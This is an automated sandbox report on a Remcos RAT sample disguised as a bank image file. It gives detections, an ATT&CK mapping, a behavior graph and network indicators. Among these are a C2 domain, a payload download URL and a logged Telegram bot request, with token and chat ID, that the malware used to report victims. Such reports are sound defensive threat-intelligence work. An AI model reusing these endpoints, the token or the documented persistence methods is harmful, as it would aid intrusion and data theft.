              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4123660.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.40fb640.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.773154547.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 5820, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 4124, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: FILE.exe PID: 4184, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4123660.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.40fb640.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.773154547.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 5820, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 4124, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: FILE.exe PID: 4184, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts11
              Scripting              		11
              Registry Run Keys / Startup Folder              		112
              Process Injection              		1
              Masquerading              		111
              Input Capture              		11
              Security Software Discovery              		Remote Services111
              Input Capture              		Exfiltration Over Other Network Medium1
              Web Service              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              PowerShell              		Boot or Logon Initialization Scripts11
              Registry Run Keys / Startup Folder              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol11
              Archive Collected Data              		Exfiltration Over Bluetooth11
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
              Virtualization/Sandbox Evasion              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
              Non-Standard Port              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)112
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer1
              Ingress Tool Transfer              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Remote System Discovery              		SSHKeyloggingData Transfer Size Limits2
              Non-Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common11
              Scripting              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureExfiltration Over C2 Channel23
              Application Layer Protocol              		Jamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items11
              Software Packing              		DCSync12
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 715079 Sample: IMG-ZIRAATI03102022.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 12 other signatures 2->59 7 IMG-ZIRAATI03102022.exe 16 6 2->7         started        12 FILE.exe 14 4 2->12         started        process3 dnsIp4 47 api.telegram.org 149.154.167.220, 443, 49701 TELEGRAMRU United Kingdom 7->47 49 www.uplooder.net 144.76.120.25, 443, 49698, 49702 HETZNER-ASDE Germany 7->49 31 C:\Users\user\AppData\Roaming\FILE.exe, PE32 7->31 dropped 33 C:\Users\user\...\FILE.exe:Zone.Identifier, ASCII 7->33 dropped 35 C:\Users\user\...\IMG-ZIRAATI03102022.exe.log, ASCII 7->35 dropped 61 Encrypted powershell cmdline option found 7->61 63 Injects a PE file into a foreign processes 7->63 14 IMG-ZIRAATI03102022.exe 4 5 7->14         started        18 powershell.exe 16 7->18         started        51 192.168.2.1 unknown unknown 12->51 65 Multi AV Scanner detection for dropped file 12->65 67 Machine Learning detection for dropped file 12->67 20 FILE.exe 2 17 12->20         started        23 powershell.exe 12 12->23         started        file5 signatures6 process7 dnsIp8 37 C:\ProgramData\work\FILE.EXE, PE32 14->37 dropped 39 C:\Users\user\AppData\Local\...\install.vbs, data 14->39 dropped 41 C:\ProgramData\...\FILE.EXE:Zone.Identifier, ASCII 14->41 dropped 69 Creates an undocumented autostart registry key 14->69 25 wscript.exe 14->25         started        27 conhost.exe 18->27         started        43 remcapi.duckdns.org 79.134.225.75, 2028, 49703 FINK-TELECOM-SERVICESCH Switzerland 20->43 45 geoplugin.net 178.237.33.50, 49704, 80 ATOM86-ASATOM86NL Netherlands 20->45 71 Installs a global keyboard hook 20->71 29 conhost.exe 23->29         started        file9 signatures10 process11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              IMG-ZIRAATI03102022.exe26%ReversingLabsByteCode-MSIL.Spyware.Noon
              IMG-ZIRAATI03102022.exe27%VirustotalBrowse
              IMG-ZIRAATI03102022.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\install.vbs100%AviraVBS/Runner.VPE
              C:\Users\user\AppData\Roaming\FILE.exe100%Joe Sandbox ML
              C:\ProgramData\work\FILE.EXE100%Joe Sandbox ML
              C:\ProgramData\work\FILE.EXE26%ReversingLabsByteCode-MSIL.Spyware.Noon
              C:\Users\user\AppData\Roaming\FILE.exe26%ReversingLabsByteCode-MSIL.Spyware.Noon

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              remcapi.duckdns.org14%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              https://api.telegram0%URL Reputationsafe
              http://james.newtonking.com/projects/json0%URL Reputationsafe
              https://api.telegram.org45k$10%Avira URL Cloudsafe
              remcapi.duckdns.org100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              remcapi.duckdns.org
              		79.134.225.75
              		truetrueunknown
              geoplugin.net
              		178.237.33.50
              		truefalse
                		unknown
                www.uplooder.net
                		144.76.120.25
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gpfalse
                    • URL Reputation: safe
                    		unknown
                    remcapi.duckdns.orgtrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://api.telegram.org/bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=1391434830&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%2010/3/2022%2011:03:09%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20IMG-ZIRAATI03102022.exefalse
                      		high
                      https://www.uplooder.net/img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpgfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.telegram.orgIMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://api.telegram.org/botIMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://geoplugin.net/json.gp/CIMG-ZIRAATI03102022.exe, 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=13914IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.newtonsoft.com/jsonschemaFILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://api.telegram.org45k$1IMG-ZIRAATI03102022.exe, 00000000.00000002.416884855.0000000002F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		low
                                https://api.telegramIMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.uplooder.netIMG-ZIRAATI03102022.exe, 00000000.00000002.416722102.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.605146002.0000000002D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.uplooder.net/img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.IMG-ZIRAATI03102022.exe, FILE.exe.0.dr, FILE.EXE.12.drfalse
                                    		high
                                    https://www.newtonsoft.com/jsonIMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.nuget.org/packages/Newtonsoft.Json.BsonIMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://api.telegram.orgIMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameIMG-ZIRAATI03102022.exe, 00000000.00000002.416722102.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.605146002.0000000002D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://james.newtonking.com/projects/jsonFILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            149.154.167.220
                                            		api.telegram.orgUnited Kingdom
                                            		62041TELEGRAMRUfalse
                                            144.76.120.25
                                            		www.uplooder.netGermany
                                            		24940HETZNER-ASDEfalse
                                            79.134.225.75
                                            		remcapi.duckdns.orgSwitzerland
                                            		6775FINK-TELECOM-SERVICESCHtrue
                                            178.237.33.50
                                            		geoplugin.netNetherlands
                                            		8455ATOM86-ASATOM86NLfalse

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                            Analysis ID:715079
                                            Start date and time:2022-10-03 16:01:00 +02:00
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 11m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:IMG-ZIRAATI03102022.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:24
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@14/15@10/5
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 261
                                            • Number of non-executed functions: 6
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240s for rundll32

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, rundll32.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            16:02:17API Interceptor86x Sleep call for process: powershell.exe modified
                                            16:03:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FILE "C:\Users\user\AppData\Roaming\FILE.exe"
                                            16:03:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FILE "C:\Users\user\AppData\Roaming\FILE.exe"

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            149.154.167.220quotation.exeGet hashmaliciousBrowse
                                              PO-13466.vbsGet hashmaliciousBrowse
                                                5YmFurdck2.exeGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Win32.DropperX-gen.15338.exeGet hashmaliciousBrowse
                                                    invoice.exeGet hashmaliciousBrowse
                                                      jWNzYd2ebg.exeGet hashmaliciousBrowse
                                                        ywk7TgzJ76.exeGet hashmaliciousBrowse
                                                          UFTMo0fwbR.exeGet hashmaliciousBrowse
                                                            v08VBOrKbV.exeGet hashmaliciousBrowse
                                                              pqpHYl5SLD.exeGet hashmaliciousBrowse
                                                                order confirmation.exeGet hashmaliciousBrowse
                                                                  Ziraat Bankas#U0131 Swift Mesaj#U0131_pdf.exeGet hashmaliciousBrowse
                                                                    Dekont.PDF.exeGet hashmaliciousBrowse
                                                                      SHIPPING DOCUMENT_PDF.exeGet hashmaliciousBrowse
                                                                        Orden de compra #PO06709.vbsGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Win32.PWSX-gen.11253.exeGet hashmaliciousBrowse
                                                                            INVOICE.exeGet hashmaliciousBrowse
                                                                              URGENT REQUEST.exeGet hashmaliciousBrowse
                                                                                Scan29092022.pdf.exeGet hashmaliciousBrowse
                                                                                  121322FBC0335..exeGet hashmaliciousBrowse
                                                                                    144.76.120.25SecuriteInfo.com.Win32.DropperX-gen.6565.exeGet hashmaliciousBrowse
                                                                                      IMG-ZIRAAT270922.exeGet hashmaliciousBrowse
                                                                                        IMG-SCAN210922.exeGet hashmaliciousBrowse
                                                                                          63G9Hz6uQ1.exeGet hashmaliciousBrowse
                                                                                            SCAN ZAHLUNG080922.scr.exeGet hashmaliciousBrowse
                                                                                              SCANRFQ0809222.scrGet hashmaliciousBrowse
                                                                                                TaxInvoice.exeGet hashmaliciousBrowse
                                                                                                  XEROX_SCAN070822.exeGet hashmaliciousBrowse
                                                                                                    PROOF OF PAYMENT.exeGet hashmaliciousBrowse
                                                                                                      Quotation Nr150320220825.exeGet hashmaliciousBrowse
                                                                                                        dC1ckixCqg.exeGet hashmaliciousBrowse
                                                                                                          oAWvleu3GE.exeGet hashmaliciousBrowse
                                                                                                            g4ODKVVTBg.exeGet hashmaliciousBrowse
                                                                                                              DHL-AWB.xlsxGet hashmaliciousBrowse
                                                                                                                Sq2mUFHfBp.exeGet hashmaliciousBrowse
                                                                                                                  order inquiry.xlsxGet hashmaliciousBrowse
                                                                                                                    New P.O. 06-13-2022.xlsxGet hashmaliciousBrowse
                                                                                                                      v36h1tX00X.exeGet hashmaliciousBrowse
                                                                                                                        wul3KGY5K1.exeGet hashmaliciousBrowse
                                                                                                                          shipping invoice.xlsxGet hashmaliciousBrowse

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            remcapi.duckdns.orgIMG-SCAN210922.exeGet hashmaliciousBrowse
                                                                                                                            • 79.134.225.75
                                                                                                                            TaxInvoice.exeGet hashmaliciousBrowse
                                                                                                                            • 194.5.97.4
                                                                                                                            XEROX_SCAN070822.exeGet hashmaliciousBrowse
                                                                                                                            • 194.5.97.4
                                                                                                                            geoplugin.netPO ZY-ZXM-2022092901.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            Consignment Deatails BL and INV20220310.jsGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            qKYRmdNGRY.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            NEW ERUO ORDER.SCR.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            Request for Quote.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            SecuriteInfo.com.Variant.Tedy.213871.1203.21319.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            new samplt details.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            xV97kUdfEF.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            58dd74be00f9f4aee71592466446b7664ea57418eda8e.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            coba_sarp#U0131z.jsGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            invoice.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            Revised PO-2022092903_________________________.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            Quotation Of Medical Disposables.xlx.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            Revised PO-2022091803____________________________.vbsGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            SecuriteInfo.com.Win32.DropperX-gen.15579.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            new FOB order.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            PO853653-35683JKD0884-8854003559254_Order.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            PO853653-35683JKD0884-8854003559254_Order.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            RFQ#6853523-962523KGF8530034_6400023_rev002.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50
                                                                                                                            702991028.exeGet hashmaliciousBrowse
                                                                                                                            • 178.237.33.50

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            TELEGRAMRUquotation.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            PO-13466.vbsGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            ZA0o2SxyU8.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            5YmFurdck2.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            rHwW5gS1cw.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            rHwW5gS1cw.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            Cguzd7Qyfh.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            SecuriteInfo.com.Win32.DropperX-gen.15338.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            invoice.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            jWNzYd2ebg.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            vbLsGSDzyI.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            FcHKUdTsxt.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            RobwdntoXs.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            qRI0CLJpMw.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            B39FF23CCAE0B2BBFA7AC0E4BE10BC45C543298465CD6.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            8eccdd9cfea1de66d15d476a5210a5594eeb9e977e185.exeGet hashmaliciousBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            HETZNER-ASDEfile.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            http://857393058784358684939586839.comGet hashmaliciousBrowse
                                                                                                                            • 5.161.130.207
                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                            • 148.251.234.83
                                                                                                                            http://857393058784358684939586839.comGet hashmaliciousBrowse
                                                                                                                            • 5.161.130.207
                                                                                                                            1F5u1OLUIL.exeGet hashmaliciousBrowse
